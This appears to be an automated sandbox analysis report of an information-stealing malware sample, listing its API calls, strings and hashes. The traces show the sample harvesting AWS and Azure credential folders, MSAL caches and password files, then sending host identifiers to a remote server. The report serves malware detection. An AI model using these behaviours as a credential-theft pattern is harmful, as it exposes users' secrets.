                                                                                                                                                                              • Opcode ID: 83d8cd278548f1fb6500124150a7b3067b729e0958cb0cffdfa182a3d6215ca1
                                                                                                                                                                              • Instruction ID: 010a1a1cef4fd6ad618c1a288a92f106c9473ede937a4b89236d4eaa0289a565
                                                                                                                                                                              • Opcode Fuzzy Hash: 83d8cd278548f1fb6500124150a7b3067b729e0958cb0cffdfa182a3d6215ca1
                                                                                                                                                                              • Instruction Fuzzy Hash: D4E1FA31D80229AFDF01AFA0EE89ADD7B76BF04350F504521F905B71A0DF35AA998F94

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A085D3
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 02A08628
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A0862F
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A086CB
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A086E4
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A086EE
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3719C), ref: 02A086FA
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A08704
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A371A0), ref: 02A08710
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A0871D
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A08727
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A371A4), ref: 02A08733
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A08740
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A0874A
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A371A8), ref: 02A08756
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A08763
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A0876D
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A371AC), ref: 02A08779
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A371B0), ref: 02A08785
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A087BE
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A0880B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                              • String ID: passwords.txt
                                                                                                                                                                              • API String ID: 1956182324-347816968
                                                                                                                                                                              • Opcode ID: e33be57b1a34e08824f19bb3821f289a88a5630c16116931835ce09e94f020e2
                                                                                                                                                                              • Instruction ID: c0fc15fd5b8b904d96754d7622332e22be4eaa3ea8460600383d0a4ae8c12acc
                                                                                                                                                                              • Opcode Fuzzy Hash: e33be57b1a34e08824f19bb3821f289a88a5630c16116931835ce09e94f020e2
                                                                                                                                                                              • Instruction Fuzzy Hash: D581FD32D80228EFDF02BFA0EE49ADD7B76BF08311B504550F901B2160DF359AA59F95

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A10549: lstrlen.KERNEL32(?,?,02A17174,02A366CF,02A366CE,?,?,?,?,02A1858F), ref: 02A1054F
                                                                                                                                                                                • Part of subcall function 02A10549: lstrcpy.KERNEL32(00000000,00000000), ref: 02A10581
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A168C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 02A1691A
                                                                                                                                                                                • Part of subcall function 02A168C6: lstrlen.KERNEL32(?), ref: 02A16925
                                                                                                                                                                                • Part of subcall function 02A168C6: StrStrA.SHLWAPI(00000000,?), ref: 02A1693A
                                                                                                                                                                                • Part of subcall function 02A168C6: lstrlen.KERNEL32(?), ref: 02A16949
                                                                                                                                                                                • Part of subcall function 02A168C6: lstrlen.KERNEL32(00000000), ref: 02A16962
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A16AA0
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A16AF9
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A16B59
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A16BB2
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A16BC8
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A16BDE
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A16BF0
                                                                                                                                                                              • Sleep.KERNEL32(0000EA60), ref: 02A16BFF
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrlen$lstrcpy$Sleep
                                                                                                                                                                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
                                                                                                                                                                              • API String ID: 2840494320-608462545
                                                                                                                                                                              • Opcode ID: 41f927cb3a484ad0b5c8ed56bae990686175a01e1f38f76a3d9cd02bbaff9cc3
                                                                                                                                                                              • Instruction ID: 8401330ef556c7ed003c77fae36e795b0210defc1ea13e7e8a663d440dd7b801
                                                                                                                                                                              • Opcode Fuzzy Hash: 41f927cb3a484ad0b5c8ed56bae990686175a01e1f38f76a3d9cd02bbaff9cc3
                                                                                                                                                                              • Instruction Fuzzy Hash: 2E91D931E80228AADF11FBA5EE86ACD7776AF00B60F518161ED15B7150DF30AE498F94

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 2315 2a01666-2a0169e GetTempPathW 2316 2a016a4-2a016cb wsprintfW 2315->2316 2317 2a01809-2a0180b 2315->2317 2318 2a016d0-2a016f5 CreateFileW 2316->2318 2319 2a017fa-2a01808 call 2a1d016 2317->2319 2318->2317 2321 2a016fb-2a0174e GetProcessHeap RtlAllocateHeap _time64 srand rand call 2a23c10 WriteFile 2318->2321 2321->2317 2325 2a01754-2a0175a 2321->2325 2325->2317 2326 2a01760-2a0179c call 2a23c10 CloseHandle CreateFileW 2325->2326 2326->2317 2329 2a0179e-2a017b1 ReadFile 2326->2329 2329->2317 2330 2a017b3-2a017b9 2329->2330 2330->2317 2331 2a017bb-2a017f1 call 2a23c10 GetProcessHeap RtlFreeHeap CloseHandle 2330->2331 2331->2318 2334 2a017f7-2a017f9 2331->2334 2334->2319
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 02A01696
                                                                                                                                                                              • wsprintfW.USER32 ref: 02A016BC
                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 02A016E6
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 02A016FE
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A01705
                                                                                                                                                                              • _time64.MSVCRT ref: 02A0170E
                                                                                                                                                                              • srand.MSVCRT ref: 02A01715
                                                                                                                                                                              • rand.MSVCRT ref: 02A0171E
                                                                                                                                                                              • _memset.LIBCMT ref: 02A0172E
                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 02A01746
                                                                                                                                                                              • _memset.LIBCMT ref: 02A01763
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 02A01771
                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 02A0178D
                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 02A017A9
                                                                                                                                                                              • _memset.LIBCMT ref: 02A017BE
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A017C8
                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000), ref: 02A017CF
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 02A017DB
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                                                                                              • String ID: %s%s$delays.tmp
                                                                                                                                                                              • API String ID: 1620473967-1413376734
                                                                                                                                                                              • Opcode ID: a6e5c41083faf4b8b1643b476aaa0a135c3e7befb158d3e7ef3eca9abe4a4aaf
                                                                                                                                                                              • Instruction ID: 509257d8eff323422eda4b38a14e930ffe29b7084e3b331f55d0da9dc09dd6b8
                                                                                                                                                                              • Opcode Fuzzy Hash: a6e5c41083faf4b8b1643b476aaa0a135c3e7befb158d3e7ef3eca9abe4a4aaf
                                                                                                                                                                              • Instruction Fuzzy Hash: 3E4186B1D40218ABDB605B61AC8CFEF7B7DEB85715F0009A9F10AE1081DF718A65CF64
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AE8
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AEE
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AF4
                                                                                                                                                                                • Part of subcall function 02A04AB6: lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04B06
                                                                                                                                                                                • Part of subcall function 02A04AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04B0E
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A04BCD
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 02A04BEB
                                                                                                                                                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A04D83
                                                                                                                                                                              • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 02A04DC7
                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A04DF5
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                              • lstrlen.KERNEL32(?,02A36953,",build_id,02A377C4,------,02A377B8,",hwid,02A377A4,------), ref: 02A050EE
                                                                                                                                                                              • lstrlen.KERNEL32(?,?,00000000), ref: 02A05101
                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,?,00000000), ref: 02A0510F
                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02A0516C
                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 02A05177
                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 02A0518E
                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 02A0519A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                                              • String ID: "$"$------$------$------$build_id$hwid
                                                                                                                                                                              • API String ID: 3006978581-3960666492
                                                                                                                                                                              • Opcode ID: 6cf1bb5c8e263d485c29b5b4848924b62275e8166c0ae20b26cb69a50897b36f
                                                                                                                                                                              • Instruction ID: ab7f8676f6f1fa8b4a375d9c20515b61391ee415c14b32a97b5a99c2a7397283
                                                                                                                                                                              • Opcode Fuzzy Hash: 6cf1bb5c8e263d485c29b5b4848924b62275e8166c0ae20b26cb69a50897b36f
                                                                                                                                                                              • Instruction Fuzzy Hash: 21028E31D9512A9ACF21AB20DE84BDDB7B6FF04350F4581E1A948B3154DE74BE8A8FD0
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 02A164E2
                                                                                                                                                                                • Part of subcall function 02A11DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A11DFD
                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 02A16501
                                                                                                                                                                              • lstrcat.KERNEL32(?,\.azure\), ref: 02A1651E
                                                                                                                                                                                • Part of subcall function 02A15FD1: wsprintfA.USER32 ref: 02A16018
                                                                                                                                                                                • Part of subcall function 02A15FD1: FindFirstFileA.KERNEL32(?,?), ref: 02A1602F
                                                                                                                                                                                • Part of subcall function 02A15FD1: StrCmpCA.SHLWAPI(?,02A36AB4), ref: 02A16050
                                                                                                                                                                                • Part of subcall function 02A15FD1: StrCmpCA.SHLWAPI(?,02A36AB8), ref: 02A1606A
                                                                                                                                                                                • Part of subcall function 02A15FD1: wsprintfA.USER32 ref: 02A16091
                                                                                                                                                                                • Part of subcall function 02A15FD1: StrCmpCA.SHLWAPI(?,02A36647), ref: 02A160A5
                                                                                                                                                                                • Part of subcall function 02A15FD1: wsprintfA.USER32 ref: 02A160C2
                                                                                                                                                                                • Part of subcall function 02A15FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 02A160EF
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?), ref: 02A16125
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?,02A36AD0), ref: 02A16137
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?,?), ref: 02A1614A
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?,02A36AD4), ref: 02A1615C
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?,?), ref: 02A16170
                                                                                                                                                                              • _memset.LIBCMT ref: 02A16556
                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 02A16578
                                                                                                                                                                              • lstrcat.KERNEL32(?,\.aws\), ref: 02A16595
                                                                                                                                                                                • Part of subcall function 02A15FD1: wsprintfA.USER32 ref: 02A160D9
                                                                                                                                                                                • Part of subcall function 02A15FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 02A16229
                                                                                                                                                                                • Part of subcall function 02A15FD1: DeleteFileA.KERNEL32(?), ref: 02A1629D
                                                                                                                                                                                • Part of subcall function 02A15FD1: FindNextFileA.KERNEL32(?,?), ref: 02A162FF
                                                                                                                                                                                • Part of subcall function 02A15FD1: FindClose.KERNEL32(?), ref: 02A16313
                                                                                                                                                                              • _memset.LIBCMT ref: 02A165CA
                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 02A165EC
                                                                                                                                                                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 02A16609
                                                                                                                                                                              • _memset.LIBCMT ref: 02A1663E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0AC8A
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02A0AD94
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A0AD9B
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A373DC,00000000), ref: 02A0AE4C
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A373E0), ref: 02A0AE74
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 02A0AE98
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A373E4), ref: 02A0AEA4
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 02A0AEAE
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A373E8), ref: 02A0AEBA
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 02A0AEC4
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A373EC), ref: 02A0AED0
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 02A0AEDA
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A373F0), ref: 02A0AEE6
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 02A0AEF0
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A373F4), ref: 02A0AEFC
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 02A0AF06
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A373F8), ref: 02A0AF12
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 02A0AF1C
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A373FC), ref: 02A0AF28
                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02A0AF7A
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A0AF95
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A0AFD8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A10C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02A013B9), ref: 02A10C5F
                                                                                                                                                                                • Part of subcall function 02A10C53: RtlAllocateHeap.NTDLL(00000000), ref: 02A10C66
                                                                                                                                                                                • Part of subcall function 02A10C53: GetUserNameA.ADVAPI32(00000000,02A013B9), ref: 02A10C7A
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,02A1858F), ref: 02A170DD
                                                                                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,?,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A170EC
                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,02A366DA), ref: 02A1760A
                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A176CB
                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A176E4
                                                                                                                                                                                • Part of subcall function 02A04B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A04BCD
                                                                                                                                                                                • Part of subcall function 02A04B2E: StrCmpCA.SHLWAPI(?), ref: 02A04BEB
                                                                                                                                                                                • Part of subcall function 02A139C2: StrCmpCA.SHLWAPI(?,block,?,?,02A17744), ref: 02A139D7
                                                                                                                                                                                • Part of subcall function 02A139C2: ExitProcess.KERNEL32 ref: 02A139E2
                                                                                                                                                                                • Part of subcall function 02A05F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A05FD8
                                                                                                                                                                                • Part of subcall function 02A05F39: StrCmpCA.SHLWAPI(?), ref: 02A05FF6
                                                                                                                                                                                • Part of subcall function 02A13198: strtok_s.MSVCRT ref: 02A131B7
                                                                                                                                                                                • Part of subcall function 02A13198: strtok_s.MSVCRT ref: 02A1323A
                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 02A17A9A
                                                                                                                                                                                • Part of subcall function 02A05F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A0618E
                                                                                                                                                                                • Part of subcall function 02A05F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 02A061D2
                                                                                                                                                                                • Part of subcall function 02A05F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A06200
                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,02A1858F), ref: 02A17100
                                                                                                                                                                                • Part of subcall function 02A1257F: __EH_prolog3_catch_GS.LIBCMT ref: 02A12589
                                                                                                                                                                                • Part of subcall function 02A1257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,02A17E31,.exe,02A36CCC,02A36CC8,02A36CC4,02A36CC0,02A36CBC,02A36CB8,02A36CB4,02A36CB0,02A36CAC,02A36CA8,02A36CA4), ref: 02A125A8
                                                                                                                                                                                • Part of subcall function 02A1257F: Process32First.KERNEL32(00000000,00000128), ref: 02A125B8
                                                                                                                                                                                • Part of subcall function 02A1257F: Process32Next.KERNEL32(00000000,00000128), ref: 02A125CA
                                                                                                                                                                                • Part of subcall function 02A1257F: StrCmpCA.SHLWAPI(?), ref: 02A125DC
                                                                                                                                                                                • Part of subcall function 02A1257F: CloseHandle.KERNEL32(00000000), ref: 02A125F0
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 02A18000
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocateConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
                                                                                                                                                                              • String ID: .exe$.exe$_DEBUG.zip$b74ef0d8ce56e494b0d83e1d5be9dbeb$cowod.$hopto$http://$org
                                                                                                                                                                              • API String ID: 2665860859-1990912409
                                                                                                                                                                              • Opcode ID: 70f91ae6cd3cd9cea463a19717d68c6e0626b3e89ab271ac0b95ee2bdc6a8359
                                                                                                                                                                              • Instruction ID: dd33a180cd12bed904ccc9d0a1f9164c99e53bfbd1c5eaae36c6fb31709aa6a3
                                                                                                                                                                              • Opcode Fuzzy Hash: 70f91ae6cd3cd9cea463a19717d68c6e0626b3e89ab271ac0b95ee2bdc6a8359
                                                                                                                                                                              • Instruction Fuzzy Hash: 99923E319883519FD621FF24DA8568EF7E6FF80720F414929E89467150DF70AA4E8F93
                                                                                                                                                                              APIs
                                                                                                                                                                              • strtok_s.MSVCRT ref: 02A135EA
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,true), ref: 02A136AC
                                                                                                                                                                                • Part of subcall function 02A10549: lstrlen.KERNEL32(?,?,02A17174,02A366CF,02A366CE,?,?,?,?,02A1858F), ref: 02A1054F
                                                                                                                                                                                • Part of subcall function 02A10549: lstrcpy.KERNEL32(00000000,00000000), ref: 02A10581
                                                                                                                                                                              • lstrcpy.KERNEL32(?,?), ref: 02A1376E
                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 02A1379F
                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 02A137DB
                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 02A13817
                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 02A13853
                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 02A1388F
                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 02A138CB
                                                                                                                                                                              • strtok_s.MSVCRT ref: 02A1398F
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                                                                              • String ID: false$true
                                                                                                                                                                              • API String ID: 2116072422-2658103896
                                                                                                                                                                              • Opcode ID: 6ff5bd26c6b7ad451cf0f351e26cd98f87683b013ee48d897e5f1f972183ff32
                                                                                                                                                                              • Instruction ID: 34e9a629e989b7ed154c771323ff899387b26d60e11317ac7a1ad28a40b46de3
